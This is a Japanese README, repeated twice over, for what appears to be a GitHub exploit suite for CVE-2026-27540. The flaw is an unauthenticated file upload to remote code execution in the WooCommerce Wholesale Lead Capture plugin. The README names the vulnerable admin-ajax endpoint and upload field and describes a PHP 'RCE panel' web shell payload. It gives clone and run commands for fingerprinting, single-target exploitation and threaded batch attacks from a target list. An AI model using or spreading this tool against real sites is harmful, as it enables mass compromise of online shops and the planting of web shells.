CVE-2026-27540(WooCommerce Wholesale Lead Capture プラグインにおける認証不要のファイルアップロードによるRCE)に対応するPythonエクスプロイトスイート。フィンガープリンティング、バッチターゲティング、RCEパネルペイロードを備える。
WooCommerce Wholesale Lead Capture (WWLC) — 認証不要のファイルアップロード → RCE
| 製品 | WooCommerce Wholesale Lead Capture — wwlc プラグイン |
| バージョン | ≤ 2.0.3.1 |
| 修正済み | 2.0.3.2+ — アップロードハンドラが保護済み |
| 認証 | 認証不要 |
| ベクター | admin-ajax.php?action=wwlc_file_upload_handler |
| フィールド | file (multipart upload) |
| 書き込み先 | WordPress uploads ディレクトリ |
| ペイロード | payloads/x7-panel.php |
wwlc_file_upload_handler の POST レート制限git clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| ファイル | 役割 |
|---|---|
winrarzips_brand.py | CMD バナー (by winrarzips) |
wwlc_core.py | Exploit エンジン |
CVE-2026-27540-Suite.py | バッチ + 単一ターゲット CLI |
payloads/x7-panel.php | RCE パネル |
requirements.txt | 依存関係 |
❌ ターゲットリスト、スキャン結果、パネル URL は リポジトリに含まれていません。
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — 認証不要のファイルアップロード → RCE
| 製品 | WooCommerce Wholesale Lead Capture — wwlc プラグイン |
| 影響を受けるバージョン | ≤ 2.0.3.1 |
| 修正済み | 2.0.3.2+ — アップロードハンドラが強化済み |
| 認証 | 認証不要 |
| ベクター | admin-ajax.php?action=wwlc_file_upload_handler |
| フィールド | file (multipart upload) |
| 書き込みパス | WordPress uploads ディレクトリ |
| ペイロード | payloads/x7-panel.php |
wwlc_file_upload_handler の POST リクエストをレート制限git clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| ファイル | 役割 |
|---|---|
winrarzips_brand.py | CMD バナー (by winrarzips) |
wwlc_core.py | Exploit コア |
CVE-2026-27540-Suite.py | バッチ + 単一ターゲット CLI |
payloads/x7-panel.php | RCE パネルペイロード |
requirements.txt | 依存関係 |
❌ ターゲットリスト、スキャン結果、ライブパネル URL は 含まれていません。
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed